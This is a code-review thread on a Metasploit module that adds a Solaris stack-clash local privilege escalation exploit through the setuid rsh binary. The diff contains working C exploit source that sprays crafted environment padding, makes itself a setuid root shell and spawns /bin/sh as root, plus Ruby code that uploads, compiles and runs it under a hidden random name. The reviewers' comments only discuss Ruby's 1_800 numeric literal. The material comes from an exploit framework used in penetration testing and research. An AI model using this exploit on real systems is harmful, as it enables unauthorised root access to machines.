modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb

```diff
@@ -0,0 +1,552 @@
+
+        if (dup2(null_fd, STDIN_FILENO) != STDIN_FILENO) die();
+        if (dup2(null_fd, STDOUT_FILENO) != STDOUT_FILENO) die();
+        if (dup2(null_fd, STDERR_FILENO) != STDERR_FILENO) die();
+
+        static char * const argv[] = { rsh_link, "-?", NULL };
+        char * const envp[] = { (char *)lca, (char *)pad, NULL };
+        execve(*argv, argv, envp);
+        die();
+    }
+    if (gettimeofday(&start, NULL)) die();
+    for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {
+        const pid_t worker_pid = workers[i_worker].pid;
+        if (worker_pid > 0) continue;
+        if (worker_pid != 0) die();
+        workers[i_worker].pid = pid;
+        workers[i_worker].start = start;
+        n_workers++;
+        return;
+    }
+    die();
+}
+
+int main(const int argc, const char * const argv[])
+{
+    static const struct rlimit core;
+    if (setrlimit(RLIMIT_CORE, &core)) die();
+
+    if (geteuid() == 0) {
+        if (is_suid_root(ROOTSHELL)) {
+            if (setuid(0)) die();
+            if (setgid(0)) die();
+            static char * const argv[] = { "/bin/sh", NULL };
+            execve(*argv, argv, NULL);
+            die();
+        }
+        chown(*argv, 0, 0);
+        chmod(*argv, 04555);
+        for (;;) {
+            raise(SIGSTOP);
+            sleep(1);
+        }
+        die();
+    }
+
+    const size_t i = strtoul(argv[1], NULL, 10);
+    if (i >= sizeof(targets)/sizeof(*targets)) die();
+    target = targets + i;
+    fprintf(stderr, "Target %zu %s\\n", i, target->name);
+
+    if (target->a >= 16) die();
+    if (target->b >= 16) die();
+    if (target->i <= 0) die();
+    if (target->j >= 16 || target->j % 4) {
+        if (target->j != SIZE_MAX) die();
+    }
+
+    static const struct sigaction sigalarm_action = { .sa_handler = sigalarm_handler };
+    if (sigaction(SIGALRM, &sigalarm_action, NULL)) die();
+
+    size_t s;
+    for (s = target->s_first; s <= target->s_last; s += target->s_step) {
+        if (s % target->s_step) die();
+
+        size_t l;
+        for (l = target->l_first; l <= target->l_last; l += target->l_step) {
+            if (l % target->l_step) die();
+            const char * const lca = build_lca(l);
+            fprintf(stdout, "s %zu l %zu\\n", s, l);
+
+            size_t p;
+            for (p = target->p_first; p <= target->p_last; p += target->p_step) {
+                if (p % target->p_step) die();
+                const char * const pad = build_pad(p);
+                fork_worker(s, lca, pad);
+            }
+        }
+    }
+    fprintf(stdout, "Failed\\n");
+}
+    EOF
+
+    exploit_name = ".#{rand_text_alphanumeric 5..15}"
+    upload_and_compile "#{base_path}/#{exploit_name}", exp
+    symlink "#{base_path}/#{exploit_name}", "#{base_path}/#{root_shell}"
+
+    print_status "Creating suid root shell. This may take a while..."
+    cmd_exec "cd #{base_path}"
+    start = Time.now
+    output = cmd_exec "./#{exploit_name} #{arg}", nil, 1_800
```

Comment:
`1_800`?
```
irb(main):001:0> 1_800
=> 1800
```
I'm not a ruby person, but wanted to check on this timeout value, is it supposed to be `1800` or do you have something new to teach me on ruby?  Wouldn't be the ... 10th time you taught me a new trick!

Reply:
`1_800` is correct. It's `1800` seconds timeout.

On a modest VM (IIRC: 1GB RAM, 1 CPU core) under no load, an exploitation attempt should either succeed or fail within half an hour (1800 seconds) - usually much quicker.

Ruby natively supports using `_` within numbers, which is useful for formatting large numbers for readability. It's typically used as a thousands-separator, but can also be used stupidly:

```
2.3.0 :001 > 1_2.3_4
 => 12.34 
2.3.0 :002 > 
```

Reply:
Looks like theres a [PEP](https://www.python.org/dev/peps/pep-0515/) for python, it just hasn't gotten there yet.

Thanks for the details, that is a neat/nice way to show bigger numbers and not have to count zeroes